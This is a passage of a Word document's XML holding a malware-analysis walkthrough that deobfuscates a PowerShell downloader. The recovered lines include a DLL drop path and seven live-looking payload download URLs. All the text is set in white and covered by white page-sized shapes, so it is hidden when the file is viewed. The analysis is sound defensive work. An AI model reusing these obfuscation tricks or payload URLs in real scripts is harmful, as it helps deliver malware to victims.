          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>. However, if you search the script for the variable e.g. </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>J16J</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>, you see it’s not in the script. It’s purely filler. We can delete all like this, especially given early in the script we see </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>$ErrorActionPreference = SilentlyContine</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>, meaning any missing variables will simply be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C718EA7" w14:textId="02597375" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>In other places, where the variable is only mentioned in two places, we can substitute the variable into where it is called e.g. </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>$Swrp6tc</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7A65B9" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Side note</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>: NOP is a “no operation” instruction in assembly language, and is often used in malware for buffer overflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319D47DE" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Format Strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DAEB6F" w14:textId="6189DA14" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>The format operator </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> is used to split and reorder strings. You simply need to rearrange them in order of the numbers (note it starts with 0). This can be done using a tool, although in this case I did it manually as it’s not too complex (and, as mentioned above, the automated tools I tried failed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86EEB8" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[TYPe]("{0}{1}{2}{4}{3}" -F 'SYsT','eM.','io.DI','ORY','rECt')</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>SYsteM.io.DIrECtORY</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>System.IO.Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7980EA2C" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[TYPe]("{6}{8}{0}{3}{4}{5}{2}{7}{1}" -f'SteM','Ger','Ma','.n','et.seRVIcepOi','nt','s','NA','Y')</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>sYSteM.net.seRVIcepOintMaNAGer</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>System.Net.ServicePointManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A49850" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>($HOME + (('{0}Db_bh30{0}Yf5be5g{0}') -F \))</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>($HOME + ('\Db_bh30\Yf5be5g\')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0274187F" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Replaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADC7509" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>There are some </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>.Replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> commands, which, as the name suggests, replace one thing with another thing. Note for both the below I’ve already replaced variables and chars and some fillers seen above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3682BD41" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>The first one is easier:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A32F11" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>$Imd1yck=$HOME+((('UOHDb_bh30UOHYf5be5gUOH'))."RePlACe"(('UOH'),[StrInG]\))+A69S+(.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5191D2" w14:textId="27CC36CE" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00CC6C20" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F8BB781" wp14:editId="3584D483">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-855717</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>330507</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7567098" cy="8639503"/>
                <wp:effectExtent l="0" t="0" r="15240" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="571418621" name="Rectangle 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7567098" cy="86395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5AD9" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:-67.4pt;margin-top:26pt;width:595.85pt;height:68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" fillcolor="white [3212]" strokecolor="white [3212]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>If we replace </w:t>
      </w:r>
      <w:r w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>UOH</w:t>
      </w:r>
      <w:r w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> with </w:t>
      </w:r>
      <w:r w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>, and get rid of some more filler, we get:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1753D552" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>$Imd1yck=$HOME+('\Db_bh30\Yf5be5g\A69S.dll')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062B6ED4" w14:textId="45A73313" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>The second is a bit more complicated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B476BCB" w14:textId="56BF4308" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>$B9fhbyv=]anw[3s://admintk.com/wp-admin/L/@]anw[3s://mikegeerinck.com/c/YYsa/@]anw[3://freelancerwebdesignerhyderabad.com/cgi-bin/S/@]anw[3://etdog.com/wp-content/nu/@]anw[3s://www.hintup.com.br/wp-content/dE/@]anw[3://www.stmarouns.nsw.edu.au/paypal/b8G/@]anw[3://wm.mcdevelop.net/content/6F2gd/."REplACe"(]anw[3,(('sd','sw'),(('http,'3d')[1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF2E1B" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Fortunately with a bit of common sense we can see </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>]anw[3</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> is being replaced with </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11986FBE" w14:textId="3BF7AD9D" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>$B9fhbyv=https://admintk.com/wp-admin/L/@https://mikegeerinck.com/c/YYsa/@http://freelancerwebdesignerhyderabad.com/cgi-bin/S/@http://etdog.com/wp-content/nu/@https://www.hintup.com.br/wp-content/dE/@http://www.stmarouns.nsw.edu.au/paypal/b8G/@http://wm.mcdevelop.net/content/6F2gd/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20038CC4" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Splits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433BEC48" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Leading on nicely from the previous result, as it is followed by a split:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE45F05" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>$B9fhbyv=https://admintk.com/wp-admin/L/@https://mikegeerinck.com/c/YYsa/@http://freelancerwebdesignerhyderabad.com/cgi-bin/S/@http://etdog.com/wp-content/nu/@https://www.hintup.com.br/wp-content/dE/@http://www.stmarouns.nsw.edu.au/paypal/b8G/@http://wm.mcdevelop.net/content/6F2gd/."sPLIT"(@)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101E2CFE" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Split on </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> - in other words, replace </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> and wrap the whole statement in </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>@()</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> - gives us an array of URLs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B0CE95" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>$B9fhbyv=@(https://admintk.com/wp-admin/L/,https://mikegeerinck.com/c/YYsa/,http://freelancerwebdesignerhyderabad.com/cgi-bin/S/,http://etdog.com/wp-content/nu/,https://www.hintup.com.br/wp-content/dE/,http://www.stmarouns.nsw.edu.au/paypal/b8G/,http://wm.mcdevelop.net/content/6F2gd/)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6A2BB9" w14:textId="77777777" w:rsidR="006B5274" w:rsidRPr="00ED2EEE" w:rsidRDefault="006B5274" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F744DAB" w14:textId="77777777" w:rsidR="006B5274" w:rsidRPr="00ED2EEE" w:rsidRDefault="006B5274" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFB4AB3" w14:textId="77777777" w:rsidR="006B5274" w:rsidRPr="00ED2EEE" w:rsidRDefault="006B5274" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="316D5C8B" w14:textId="15FBCDE1" w:rsidR="006B5274" w:rsidRPr="00ED2EEE" w:rsidRDefault="00CC6C20" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40C1683B" wp14:editId="070C3264">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-966076</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>172851</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7677457" cy="8891752"/>
                <wp:effectExtent l="0" t="0" r="19050" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="1028549647" name="Rectangle 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7677457" cy="88917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2F65" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:-76.05pt;margin-top:13.6pt;width:604.5pt;height:70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" fillcolor="white [3212]" strokecolor="white [3212]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
